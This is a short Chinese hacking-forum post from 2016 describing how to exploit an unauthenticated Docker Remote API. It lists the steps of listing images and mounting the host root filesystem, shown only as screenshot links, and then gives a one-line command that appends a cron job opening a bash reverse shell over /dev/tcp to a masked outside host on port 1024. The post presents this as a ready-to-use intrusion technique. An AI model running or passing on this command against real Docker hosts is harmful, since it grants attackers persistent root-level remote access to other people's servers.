搜索
查看: 970|回复: 0

Docker Remote API未授权访问漏洞测试方法

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2016-5-17 17:07:58 | 显示全部楼层 |阅读模式
列出可用的Image
[/url]
挂载宿主机的根目录到/mnt
[url=http://static.wooyun.org/upload/image/201605/2016051716324531199.png]

通过写crontab文件来反弹shell
  1. echo "* * * * * root /bin/bash -i >& /dev/tcp/*/1024 0>&1" >> /mnt/etc/crontab
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表